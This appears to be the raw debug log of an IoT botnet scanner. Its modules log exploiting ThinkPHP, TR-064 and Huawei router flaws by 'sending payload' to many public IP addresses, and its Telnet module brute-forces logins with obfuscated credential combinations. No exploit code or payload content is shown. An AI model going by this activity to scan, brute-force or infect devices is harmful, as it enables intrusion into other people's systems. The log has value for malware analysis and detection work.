[ThinkPHPRep] FD11 sending payload
[ThinkPHPRep] FD31 connected to 95.62.22.43
[ThinkPHPRep] FD31 sending payload
[ThinkPHPRep] FD31 finnished
[ThinkPHPRep] FD5 finnished
[ThinkPHPRep] FD14 connected to 112.16.92.188
[ThinkPHPRep] FD7 finnished
[ThinkPHPRep] FD6 finnished
[ThinkPHPRep] FD10 finnished
[ThinkPHPRep] FD8 finnished
[ThinkPHPRep] FD12 finnished
[ThinkPHPRep] FD13 finnished
[ThinkPHPRep] FD15 finnished
[ThinkPHPRep] FD16 finnished
[ThinkPHPRep] FD14 sending payload
[ThinkPHPRep] FD11 finnished
[ThinkPHPRep] FD10 connected to 88.206.136.227
[ThinkPHPRep] FD10 sending payload
[ThinkPHPRep] FD8 connected to 112.246.23.11
[ThinkPHPRep] FD7 connected to 112.234.173.97
[ThinkPHPRep] FD8 sending payload
[ThinkPHPRep] FD7 sending payload
[ThinkPHPRep] FD7 finnished
[ThinkPHPRep] FD9 connected to 88.190.45.192
[ThinkPHPRep] FD10 finnished
[ThinkPHPRep] FD12 connected to 112.206.11.73
[ThinkPHPRep] FD9 sending payload
[ThinkPHPRep] FD12 sending payload
[ThinkPHPRep] FD8 finnished
[ThinkPHPRep] FD8 connected to 88.30.53.43
[ThinkPHPRep] FD8 sending payload
[ThinkPHPRep] FD8 finnished
[ThinkPHPRep] FD9 finnished
[ThinkPHPRep] FD7 finnished
[ThinkPHPRep] FD[TelnetScanner] FD16 connected. Trying :GFDO
[TelnetScanner] FD121 connection gracefully closed
[TelnetScanner] FD121 lost connection
[TelnetScanner] FD121 retrying with different auth combo!
[TelnetScanner] FD121 connected. Trying :5
[TelnetScanner] FD130 connection gracefully closed
[TelnetScanner] FD130 lost connection
[TelnetScanner] FD130 retrying with different auth combo!
[TelnetScanner] FD130 connected. Trying :GDE
[TelnetScanner] FD131 connection gracefully closed
[TelnetScanner] FD131 lost connection
[TelnetScanner] FD131 retrying with different auth combo!
[TelnetScanner] FD131 connected. Trying :, %?&
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :<@
[TelnetScanner] FD99 connection gracefully closed
[TelnetScanner] FD99 lost connection
[TelnetScanner] FD99 retrying with different auth combo!
[TelnetScanner] FD99 connected. Trying :,CDG
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD10 connected. Trying :
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD31 timed out (state = 1)
[TelnetScanner] FD32 timed out (state = 1)
[TelnetScanner] FD33 timed out (state = 1)
[TelnetScanner] FD35 timed out (state = 1)
[TelnetScanner] FD58 timed out (state = 1)
[TelnetScanner] FD60 timed out (state = 1)
[TelnetScanner] FD61 timed out (state = 1)
[TelnetScanner] FD62 timed out (state = 1)
[TelnetScanner] FD66 timed out (state = 1)
[TelnetScanner] FD68 timed out (state = 1)
[TelnetScanner] FD69 timed out (state = 1)
[TelnetScanner] FD81 timed out (state = 1)
[TelnetScanner] FD82 timed out (state = 1)
[TelnetScanner] FD83 timed out (state = 1)
[TelnetScanner] FD85 timed out (state = 1)
[TelnetScanner] FD86 timed out (state = 1)
[TelnetScanner] FD87 timed out (state = 1)
[TelnetScanner] FD88 timed out (state = 1)
[TelnetScanner] FD90 timed out (state = 1)
[TelnetScanner] FD92 timed out (state = 1)
[TelnetScanner] FD95 timed out (state = 1)
[TelnetScanner] FD96 timed out (state = 1)
[TelnetScanner] FD98 timed out (state = 1)
[TelnetScanner] FD100 timed out (state = 1)
[TelnetScanner] FD101 timed out (state = 1)
[TelnetScanner] FD103 timed out (state = 1)
[TelnetScanner] FD11 connected. Trying :ECGN
[TelnetScanner] FD31 Attempting to brute found IP 138.132.16.147
[TelnetScanner] FD32 Attempting to brute found IP 91.13.40.56
[TelnetScanner] FD33 Attempting to brute found IP 132.125.193.48
[TelnetScanner] FD35 Attempting to brute found IP 208.229.8.62
[TelnetScanner] FD58 Attempting to brute found IP 92.5.141.146
[TelnetScanner] FD60 Attempting to brute found IP 173.249.141.103
[TelnetScanner] FD61 Attempting to brute found IP 140.24.147.243
[TelnetScanner] FD62 Attempting to brute found IP 87.9.39.67
[TelnetScanner] FD66 Attempting to brute found IP 69.91.15.227
[TelnetScanner] FD68 Attempting to brute found IP 207.10.100.200
[TelnetScanner] FD69 Attempting to brute found IP 121.64.17.39
[TelnetScanner] FD81 Attempting to brute found IP 186.60.151.47
[TelnetScanner] FD82 Attempting to brute found IP 136.215.223.220
[TelnetScanner] FD83 Attempting to brute found IP 31.175.25.252
[TelnetScanner] FD85 Attempting to brute found IP 132.65.144.0
[TelnetScanner] FD86 Attempting to brute found IP 150.41.103.141
[TelnetScanner] FD66 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD99 connection gracefully closed
[TelnetScanner] FD99 lost connection
[TelnetScanner] FD87 retrying with different auth combo!
[TelnetScanner] FD20 connection gracefully closed
[TelnetScanner] FD20 lost connection
[TelnetScanner] FD20 retrying with different auth combo!
[TelnetScanner] FD20 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :A;F
[TelnetScanner] FD114 connection gracefully closed
[TelnetScanner] FD114 lost connection
[TelnetScanner] FD88 retrying with different auth combo!
[TelnetScanner] FD88 connected. Trying :, %?&
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD129 connection gracefully closed
[TelnetScanner] FD129 lost connection
[TelnetScanner] FD90 retrying with different auth combo!
[TelnetScanner] FD90 connected. Trying :A;F
[TelnetScanner] FD126 connection gracefully closed
[TelnetScanner] FD126 lost connection
[TelnetScanner] FD92 retrying with different auth combo!
[TelnetScanner] FD95 Attempting to brute found IP 212.25.16.247
[TelnetScanner] FD96 Attempting to brute found IP 20.63.243.75
[TelnetScanner] FD98 Attempting to brute found IP 45.67.113.116
[TelnetScanner] FD99 Attempting to brute found IP 95.193.165.106
[TelnetScanner] FD100 Attempting to brute found IP 200.51.93.101
[TelnetScanner] FD101 Attempting to brute found IP 142.172.21.108
[TelnetScanner] FD103 Attempting to brute found IP 68.85.200.237
[TelnetScanner] FD114 Attempting to brute found IP 70.104.77.161
[TelnetScanner] FD126 Attempting to brute found IP 221.47.45.41
[TelnetScanner] FD129 Attempting to brute found IP 154.123.165.88
[TelnetScanner] FD95 connected. Trying :
[TelnetScanner] FD96 connected. Trying :ECGN
[TelnetScanner] FD124 connection gracefully closed
[TelnetScanner] FD124 lost connection
[TelnetScanner] FD124 retrying with different auth combo!
[TelnetScanner] FD92 connected. Trying :1;NGND
[TelnetScanner] FD32 connected. Trying :ECGG
[TelnetScanner] FD33 connected. Trying :
[TelnetScanner] FD58 connected. Trying :
[TelnetScanner] FD60 connected. Trying :
[TelnetScanner] FD61 connected. Trying :A;F
[TelnetScanner] FD62 connected. Trying :
[TelnetScanner] FD68 connected. Trying :
[TelnetScanner] FD69 connected. Trying :
[TelnetScanner] FD82 connected. Trying :A;F
[TelnetScanner] FD83 connected. Trying :
[TelnetScanner] FD85 connected. Trying :
[TelnetScanner] FD86 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :ECGN
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD18 connection gracefully closed
[TelnetScanner] FD18 lost connection
[TelnetScanner] FD18 retrying with different auth combo!
[TelnetScanner] FD18 connected. Trying ECFF:
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD98 connected. Trying :ECGN
[TelnetScanner] FD99 connected. Trying :
[TelnetScanner] FD100 connected. Trying :
[TelnetScanner] FD101 connected. Trying :
[TelnetScanner] FD103 connected. Trying :GDEBC@
[TelnetScanner] FD114 connected. Trying :
[TelnetScanner] FD126 connected. Trying :5
[TelnetScanner] FD129 connected. Trying :GDEBC@
[TelnetScanner] FD124 connected. Trying :<@
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFG@
[TelnetScanner] FD11 connection gracefully closed
15 connected to 173.7.66.239
[Tr064] FD15 sending payload
[Tr064] FD15 finnished
[Tr064] FD17 connected to 222.248.109.154
[Tr064] FD18 connected to 117.72.105.56
[Tr064] FD19 connected to 151.218.121.69
[Tr064] FD20 connected to 24.231.68.64
[Tr064] FD21 connected to 70.13.124.3
[Tr064] FD8 finnished
[Tr064] FD10 connected to 148.153.227.132
[Tr064] FD13 connected to 27.52.172.207
[Tr064] FD17 sending payload
[Tr064] FD18 sending payload
[Tr064] FD19 sending payload
[Tr064] FD20 sending payload
[Tr064] FD21 sending payload
[Tr064] FD6 finnished
[Tr064] FD7 finnished
[Tr064] FD9 finnished
[Tr064] FD10 sending payload
[Tr064] FD13 sending payload
[Tr064] FD22 connected to 17.36.228.11
[Tr064] FD22 sending payload
[Tr064] FD10 finnished
[Tr064] FD6 finnished
[Tr064] FD7 finnished
[Tr064] FD9 connected to 84.150.145.234
[Tr064] FD18 finnished
[Tr064] FD69 connected to 61.252.193.91
[Tr064] FD9 sending payload
[Tr064] FD8 finnished
[Tr064] FD15 finnished
[Tr064] FD17 finnished
[Tr064] FD19 finnished
[Tr064] FD68 connected to 179.81.32.26
[Tr064] FD69 sending payload
[Tr064] FD79 connected to 91.213.97.16
[Tr064] FD81 finnished
[Tr064] FD68 sending payload
[Tr064] FD79 sending payload
[Tr064] FD9 finnished
[Tr064] FD11 connected to 4.1.174.131
[Tr064] FD14 connected to 183.111.63.185
[Tr064] FD16 connected to 171.159.228.245
[Tr064] FD5 finnished
[Tr064] FD11 sending payload
[Tr064] FD12 connected to 104.233.60.84
[Tr064] FD14 sending payload
[Tr064] FD16 sending payload
[Tr064] FD12 sending payload
[Tr064] FD8 finnished
[Tr064] FD12 connected to 219.96.62.100
[Tr064] FD12 sending payload
[Tr064] FD5 finnished
[Tr064] FD11 finnished
[Tr064] FD9 finnished
[Tr064] FD10 finnished
[Tr064] FD19 connected to 135.18.122.25
[Tr064] FD5 connected to 195.210.166.212
[Tr064] FD12 finnished
[Tr064] FD19 sending payload
[Tr064] FD5 sending payload
[Tr064] FD24 connected to 205.248.172.193
[Tr064] FD24 sending payload
[Tr064] FD6 finnished
[Tr064] FD7 finnished
[Tr064] FD5 finnished
[Tr064] FD12 finnished
[Tr064] FD19 finnished
[Tr064] FD6 connected to 162.161.88.195
[Tr064] FD6 sending payload
[Tr064] FD6 finnished
[Tr064] FD15 connected to 143.49.51.0
[Tr064] FD8 connected to 93.120.180.208
[Tr064] FD13 connected to 208.116.40.165
[Tr064] FD14 connected to 38.229.48.93
[Tr064] FD15 sending payload
[Tr064] FD16 connected to 195.154.135.226
[Tr064] FD17 connected to 218.228.250.50
[Tr064] FD18 connected to 90.203.84.242
[Tr064] FD8 sending payload
[Tr064] FD13 sending payload
[Tr064] FD14 sending payload
[Tr064] FD16 sending payload
[Tr064] FD17 sending payload
[Tr064] FD18 sending payload
[Tr064] FD38 connected to 57.27.13.63
[Tr064] FD38 sending payload
[Tr064] FD47 connected to 102.68.3.84
[Tr064] FD59 connected to 163.134.163.13
[Tr064] FD47 sending payload
[Tr064] FD59 sending payload
[Tr064] FD12 connected to 79.222.225.87
[Tr064] FD12 sending payload
[Tr064] FD51 connected to 187.161.138.55
[Tr064] FD58 connected to 44.137.173.33
[Tr064] FD60 connected to 183.111.38.75
[Tr064] FD61 connected to 89.173.103.98
[Tr064] FD62 connected to 222.243.192.193
[Tr064] FD64 connected to 54.18.113.190
[Tr064] FD66 connected to 1.149.222.144
[Tr064] FD8 finnished
[Tr064] FD13 finnished
[Tr064] FD6 finnished
[Tr064] FD15 finnished
[Tr064] FD16 finnished
[Tr064] FD48 connected to 95.15.207.161
[Tr064] FD50 connected to 112.196.136.248
[Tr064] FD51 sending payload
[Tr064] FD52 connected to 38.40.126.181
[Tr064] FD55 connected to 27.237.223.85
[Tr064] FD56 connected to 185.43.242.23
[Tr064] FD57 connected to 2.17.219.85
[Tr064] FD58 sending payload
[Tr064] FD60 sending payload
[Tr064] FD61 sending payload
[Tr064] FD62 sending payload
[Tr064] FD63 connected to 136.149.48.114
[Tr064] FD64 sending payload
[Tr064] FD65 connected to 188.250.112.91
[Tr064] FD66 sending payload
[Tr064] FD48 sending payload
[Tr064] FD50 sending payload
[Tr064] FD52 sending payload
[Tr064] FD55 sending payload
[Tr064] FD56 sending payload
[Tr064] FD57 sending payload
[Tr064] FD63 sending payload
[Tr064] FD65 sending payload
[Tr064] FD50 finnished
[Tr064] FD12 finnished
[Tr064] FD[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD22 connection gracefully closed
[TelnetScanner] FD22 lost connection
[TelnetScanner] FD22 retrying with different auth combo!
[TelnetScanner] FD22 connected. Trying :<@
[TelnetScanner] FD24 connection gracefully closed
[TelnetScanner] FD24 lost connection
[TelnetScanner] FD24 retrying with different auth combo!
[TelnetScanner] FD21 connection gracefully closed
[TelnetScanner] FD21 lost connection
[TelnetScanner] FD21 retrying with different auth combo!
[TelnetScanner] FD23 connection gracefully closed
[TelnetScanner] FD23 lost connection
[TelnetScanner] FD23 retrying with different auth combo!
[TelnetScanner] FD24 connected. Trying :
[TelnetScanner] FD21 connected. Trying :DFGB
[TelnetScanner] FD28 connection gracefully closed
[TelnetScanner] FD28 lost connection
[TelnetScanner] FD28 retrying with different auth combo!
[TelnetScanner] FD23 connected. Trying :9%1N
[TelnetScanner] FD26 connection gracefully closed
[TelnetScanner] FD26 lost connection
[TelnetScanner] FD26 retrying with different auth combo!
[TelnetScanner] FD27 connection gracefully closed
[TelnetScanner] FD27 lost connection
[TelnetScanner] FD27 retrying with different auth combo!
[TelnetScanner] FD28 connected. Trying :
[TelnetScanner] FD72 connection gracefully closed
[TelnetScanner] FD72 lost connection
[TelnetScanner] FD72 retrying with different auth combo!
[TelnetScanner] FD26 connected. Trying :DFGE
[TelnetScanner] FD27 connected. Trying :
[TelnetScanner] FD72 connected. Trying :DFGE
[TelnetScanner] FD59 connection gracefully closed
[TelnetScanner] FD59 lost connection
[TelnetScanner] FD59 retrying with different auth combo!
[TelnetScanner] FD59 connected. Trying :DFGD
[TelnetScanner] FD94 connection gracefully closed
[TelnetScanner] FD94 lost connection
[TelnetScanner] FD94 retrying with different auth combo!
[TelnetScanner] FD94 connected. Trying :ECGN
[TelnetScanner] FD107 connection gracefully closed
[TelnetScanner] FD107 lost connection
[TelnetScanner] FD107 retrying with different auth combo!
[TelnetScanner] FD107 connected. Trying ECFF:
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD19 timed out (state = 1)
[TelnetScanner] FD11 connected. Trying :GDEBC@
[TelnetScanner] FD81 connected. Trying :DFGB
[TelnetScanner] FD19 Attempting to brute found IP 135.105.166.85
[TelnetScanner] FD35 connected. Trying :DFGD
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :%D180
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD20 connection gracefully closed
[TelnetScanner] FD20 lost connection
[TelnetScanner] FD20 retrying with different auth combo!
[TelnetScanner] FD20 connected. Trying :, %?&
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :1;NGND
[TelnetScanner] FD77 connection gracefully closed
[TelnetScanner] FD77 lost connection
[TelnetScanner] FD77 retrying with different auth combo!
[TelnetScanner] FD70 connection gracefully closed
[TelnetScanner] FD70 lost connection
[TelnetScanner] FD70 retrying with different auth combo!
[TelnetScanner] FD65 connection gracefully closed
[TelnetScanner] FD65 lost connection
[TelnetScanner] FD65 retrying with different auth combo!
[TelnetScanner] FD77 connected. Trying :<@
[TelnetScanner] FD70 connected. Trying :GFDO
[TelnetScanner] FD67 connection gracefully closed
[TelnetScanner] FD67 lost connection
[TelnetScanner] FD67 retrying with different auth combo!
[TelnetScanner] FD75 connection gracefully closed
[TelnetScanner] FD75 lost connection
[TelnetScanner] FD75 retrying with different auth combo!
[TelnetScanner] FD65 connected. Trying :
[TelnetScanner] FD67 connected. Trying :DFGE
[TelnetScanner] FD75 connected. Trying :, %?&
[TelnetScanner] FD104 connection gracefully closed
[TelnetScanner] FD104 lost connection
[TelnetScanner] FD104 retrying with different auth combo!
[TelnetScanner] FD106 connection gracefully closed
[TelnetScanner] FD106 lost connection
[TelnetScanner] FD106 retrying with different auth combo!
[TelnetScanner] FD104 connected. Trying :
[TelnetScanner] FD106 connected. Trying :, %?&
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD5 timed out (state = 1)
[TelnetScanner] FD7 timed out (state = 1)
[TelnetScanner] FD9 timed out (state = 1)
[TelnetScanner] FD98 connected. Trying :DFG@
[TelnetScanner] FD5 Attempting to brute found IP 63.136.238.203
[TelnetScanner] FD7 Attempting to brute found IP 190.101.118.249
[TelnetScanner] FD9 Attempting to brute found IP 219.162.87.45
[TelnetScanner] FD17 connection gracefully closed
[TelnetScanner] FD17 lost connection
[TelnetScanner] FD17 retrying with different auth combo!
[TelnetScanner] FD12 connection gracefully closed
[TelnetScanner] FD12 lost connection
[TelnetScanner] FD12 retrying with different auth combo!
[TelnetScanner] FD17 connected. Trying :GFDO
[TelnetScanner] FD14 connection gracefully closed
[TelnetScanner] FD14 lost connection
[TelnetScanner] FD14 retrying with different auth combo!
[TelnetScanner] FD12 connected. Trying :
[TelnetScanner] FD15 connection gracefully closed
[TelnetScanner] FD15 lost connection
[TelnetScanner] FD15 retrying with different auth combo!
[TelnetScanner] FD14 connected. Trying :GDE
[TelnetScanner] FD15 connected. Trying :
[TelnetScanner] FD13 connection gracefully closed
[TelnetScanner] FD13 lost connection
[TelnetScanner] FD13 retrying with different auth combo!
[TelnetScanner] FD25 connection gracefully closed
[TelnetScanner] FD25 lost connection
[TelnetScanner] FD25 retrying with different auth combo!
[TelnetScanner] FD13 connected. Trying :<@
[TelnetScanner] FD25 connected. Trying :GDEBC@
[TelnetScanner] FD36 connection gracefully closed
[TelnetScanner] FD36 lost connection
[TelnetScanner] FD36 retrying with different auth combo!
[TelnetScanner] FD36 connected. Trying :
[TelnetScanner] FD19 connected. Trying :ECGG
[TelnetScanner] FD38 connection gracefully closed
[TelnetScanner] FD38 lost connection
[TelnetScanner] FD38 retrying with different auth combo!
[TelnetScanner] FD44 connection gracefully closed
[TelnetScanner] FD44 lost connection
[TelnetScanner] FD44 retrying with different auth combo!
[TelnetScanner] FD37 connection gracefully closed
[TelnetScanner] FD37 lost connection
[TelnetScanner] FD37 retrying with different auth combo!
[TelnetScanner] FD38 connected. Trying :,CDG
[TelnetScanner] FD42 connection gracefully closed
[TelnetScanner] FD42 lost connection
[TelnetScanner] FD42 retrying with different auth combo!
[TelnetScanner] FD44 connected. Trying :A;F
[TelnetScanner] FD37 connected. Trying :9%1N
[TelnetScanner] FD42 connected. Trying :
[TelnetScanner] FD40 connection gracefully closed
[TelnetScanner] FD40 lost connection
[TelnetScanner] FD40 retrying with different auth combo!
[TelnetScanner] FD45 connection gracefully closed
[TelnetScanner] FD45 lost connection
Momentum Debugging Mode
[main] We are the only process on this system!
[HuaweiRep] scanner process initialized. scanning started.
[HuaweiRep] FD13 connected to 197.231.115.92
[HuaweiRep] FD19 connected to 197.35.120.68
[HuaweiRep] FD24 connected to 197.82.132.165
[HuaweiRep] FD29 connected to 197.1.17.211
[HuaweiRep] FD38 connected to 197.214.151.6
[HuaweiRep] FD47 connected to 157.192.14.122
[HuaweiRep] FD13 sending payload
[HuaweiRep] FD19 sending payload
[HuaweiRep] FD24 sending payload
[HuaweiRep] FD29 sending payload
[HuaweiRep] FD38 sending payload
[HuaweiRep] FD47 sending payload
[HuaweiRep] FD19 finished
[HuaweiRep] FD9 connected to 197.66.118.144
[HuaweiRep] FD10 connected to 197.110.66.253
[HuaweiRep] FD11 connected to 197.92.154.104
[HuaweiRep] FD5 connected to 41.64.216.200
[HuaweiRep] FD6 connected to 197.43.94.220
[HuaweiRep] FD7 connected to 197.173.145.34
[HuaweiRep] FD8 connected to 197.69.92.235
[HuaweiRep] FD9 sending payload
[HuaweiRep] FD10 sending payload
[HuaweiRep] FD11 sending payload
[HuaweiRep] FD5 sending payload
[HuaweiRep] FD6 sending payload
[HuaweiRep] FD7 sending payload
[HuaweiRep] FD8 sending payload
[HuaweiRep] FD10 finished
[HuaweiRep] FD55 connected to 157.104.28.118
[HuaweiRep] FD57 connected to 157.192.10.165
[HuaweiRep] FD64 connected to 157.6.178.3
[HuaweiRep] FD71 connected to 157.61.168.142
[HuaweiRep] FD77 connected to 157.80.225.36
[HuaweiRep] FD86 connected to 157.225.168.156
[HuaweiRep] FD92 connected to 157.80.236.249
[HuaweiRep] FD100 connected to 157.8.44.55
[HuaweiRep] FD55 sending payload
[HuaweiRep] FD57 sending payload
[HuaweiRep] FD64 sending payload
[HuaweiRep] FD71 sending payload
[HuaweiRep] FD77 sending payload
[HuaweiRep] FD86 sending payload
[HuaweiRep] FD92 sending payload
[HuaweiRep] FD100 sending payload
[HuaweiRep] FD106 connected to 157.29.123.104
[HuaweiRep] FD55 finished
[HuaweiRep] FD106 sending payload
[HuaweiRep] FD92 finished
[HuaweiRep] FD9 finished
[HuaweiRep] FD11 finished
[HuaweiRep] FD19 connected to 157.225.245.179
[HuaweiRep] FD52 connected to 157.65.6.184
[HuaweiRep] FD53 connected to 157.22.152.88
[HuaweiRep] FD54 connected to 157.75.113.189
[HuaweiRep] FD19 sending payload
[HuaweiRep] FD52 sending payload
[HuaweiRep] FD53 sending payload
[HuaweiRep] FD54 sending payload
[HuaweiRep] FD63 connected to 157.188.223.69
[HuaweiRep] FD66 connected to 157.49.41.117
[HuaweiRep] FD63 sending payload
[HuaweiRep] FD66 sending payload
[HuaweiRep] FD89 connected to 157.229.239.145
[HuaweiRep] FD89 sending payload
[HuaweiRep] FD80 connected to 157.42.126.115
[HuaweiRep] FD80 sending payload
[HuaweiRep] FD63 finished
[HuaweiRep] FD8 finished
[HuaweiRep] FD77 finished
[HuaweiRep] FD86 finished
[HuaweiRep] FD55 finished
[HuaweiRep] FD50 connected to 157.107.233.249
[HuaweiRep] FD50 sending payload
[HuaweiRep] FD66 finished
[HuaweiRep] FD8 finished
[HuaweiRep] FD68 connected to 157.69.215.80
[HuaweiRep] FD68 sending payload
[HuaweiRep] FD90 connected to 157.158.131.33
[HuaweiRep] FD93 connected to 157.102.108.142
[HuaweiRep] FD90 sending payload
[HuaweiRep] FD93 sending payload
[HuaweiRep] FD55 finished
[HuaweiRep] FD10 finished
[HuaweiRep] FD57 finished
[HuaweiRep] FD11 finished
[HuaweiRep] FD8 finished
[HuaweiRep] FD8 connected to 41.1.51.125
[HuaweiRep] FD8 sending payload
[HuaweiRep] FD50 connected to 156.62.121.124
[HuaweiRep] FD50 sending payload
[HuaweiRep] FD63 finished
[HuaweiRep] FD10 finished
[HuaweiRep] FD8 finished
[HuaweiRep] FD8 connected to 157.223.179.206
[HuaweiRep] FD8 sending payload
[HuaweiRep] FD10 connected to 157.115.57.115
[HuaweiRep] FD10 sending payload
[HuaweiRep] FD9 finished
[HuaweiRep] FD6 connected to 41.136.2.201
[HuaweiRep] FD7 connected to 41.129.33.87
[HuaweiRep] FD8 connected to 41.165.166.187
[HuaweiRep] FD5 finished
[HuaweiRep] FD6 sending payload
[HuaweiRep] FD7 sending payload
[HuaweiRep] FD8 sending payload
[HuaweiRep] FD6 finished
[HuaweiRep] FD10 connected to 197.122.232.121
[HuaweiRep] FD10 sending payload
[HuaweiRep] FD17 connected to 197.176.108.69
[HuaweiRep] FD17 sending payload
[HuaweiRep] FD18 connected to 156[TelnetScanner] FD45 retrying with different auth combo!
[TelnetScanner] FD39 connection gracefully closed
[TelnetScanner] FD39 lost connection
[TelnetScanner] FD39 retrying with different auth combo!
[TelnetScanner] FD40 connected. Trying :
[TelnetScanner] FD46 connection gracefully closed
[TelnetScanner] FD46 lost connection
[TelnetScanner] FD46 retrying with different auth combo!
[TelnetScanner] FD45 connected. Trying :
[TelnetScanner] FD39 connected. Trying :9%1N
[TelnetScanner] FD46 connected. Trying :A;F
[TelnetScanner] FD41 connection gracefully closed
[TelnetScanner] FD41 lost connection
[TelnetScanner] FD41 retrying with different auth combo!
[TelnetScanner] FD43 connection gracefully closed
[TelnetScanner] FD43 lost connection
[TelnetScanner] FD43 retrying with different auth combo!
[TelnetScanner] FD50 connection gracefully closed
[TelnetScanner] FD50 lost connection
[TelnetScanner] FD50 retrying with different auth combo!
[TelnetScanner] FD50 connected. Trying :GFDO
[TelnetScanner] FD55 connection gracefully closed
[TelnetScanner] FD55 lost connection
[TelnetScanner] FD55 retrying with different auth combo!
[TelnetScanner] FD63 connection gracefully closed
[TelnetScanner] FD63 lost connection
[TelnetScanner] FD63 retrying with different auth combo!
[TelnetScanner] FD76 connection gracefully closed
[TelnetScanner] FD76 lost connection
[TelnetScanner] FD76 retrying with different auth combo!
[TelnetScanner] FD71 connection gracefully closed
[TelnetScanner] FD71 lost connection
[TelnetScanner] FD71 retrying with different auth combo!
[TelnetScanner] FD63 connected. Trying :DFGD
[TelnetScanner] FD71 connected. Trying :
[TelnetScanner] FD89 connection gracefully closed
[TelnetScanner] FD89 lost connection
[TelnetScanner] FD89 retrying with different auth combo!
[TelnetScanner] FD84 connection gracefully closed
[TelnetScanner] FD84 lost connection
[TelnetScanner] FD84 retrying with different auth combo!
[TelnetScanner] FD89 connected. Trying :
[TelnetScanner] FD97 connection gracefully closed
[TelnetScanner] FD97 lost connection
[TelnetScanner] FD97 retrying with different auth combo!
[TelnetScanner] FD102 connection gracefully closed
[TelnetScanner] FD102 lost connection
[TelnetScanner] FD102 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD98 connected. Trying :
[TelnetScanner] FD111 connection gracefully closed
[TelnetScanner] FD111 lost connection
[TelnetScanner] FD111 retrying with different auth combo!
[TelnetScanner] FD108 connection gracefully closed
[TelnetScanner] FD108 lost connection
[TelnetScanner] FD108 retrying with different auth combo!
[TelnetScanner] FD122 connection gracefully closed
[TelnetScanner] FD122 lost connection
[TelnetScanner] FD122 retrying with different auth combo!
[TelnetScanner] FD125 connection gracefully closed
[TelnetScanner] FD125 lost connection
[TelnetScanner] FD125 retrying with different auth combo!
[TelnetScanner] FD127 connection gracefully closed
[TelnetScanner] FD127 lost connection
[TelnetScanner] FD127 retrying with different auth combo!
[TelnetScanner] FD111 connected. Trying :
[TelnetScanner] FD108 connected. Trying :DFGD
[TelnetScanner] FD122 connected. Trying :
[TelnetScanner] FD125 connected. Trying :A;F
[TelnetScanner] FD127 connected. Trying :
[TelnetScanner] FD5 connected. Trying :,CDG
[TelnetScanner] FD7 connected. Trying :A;F
[TelnetScanner] FD9 connected. Trying :DFGE
[TelnetScanner] FD8 connection gracefully closed
[TelnetScanner] FD8 lost connection
[TelnetScanner] FD8 retrying with different auth combo!
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD8 connected. Trying :
[TelnetScanner] FD16 connected. Trying :ECGN
[TelnetScanner] FD34 connection gracefully closed
[TelnetScanner] FD34 lost connection
[TelnetScanner] FD34 retrying with different auth combo!
[TelnetScanner] FD34 connected. Trying ECFF:
[TelnetScanner] FD98 connection gracefully closed
[TelnetScanner] FD98 lost connection
[TelnetScanner] FD98 retrying with different auth combo!
[TelnetScanner] FD51 connection gracefully closed
[TelnetScanner] FD51 lost connection
[TelnetScanner] FD51 retrying with different auth combo!
[TelnetScanner] FD48 connection gracefully closed
[TelnetScanner] FD48 lost connection
[TelnetScanner] FD48 retrying with different auth combo!
[TelnetScanner] FD54 connection gracefully closed
[TelnetScanner] FD54 lost connection
[TelnetScanner] FD54 retrying with different auth combo!
[TelnetScanner] FD43 connected. Trying :,CDG
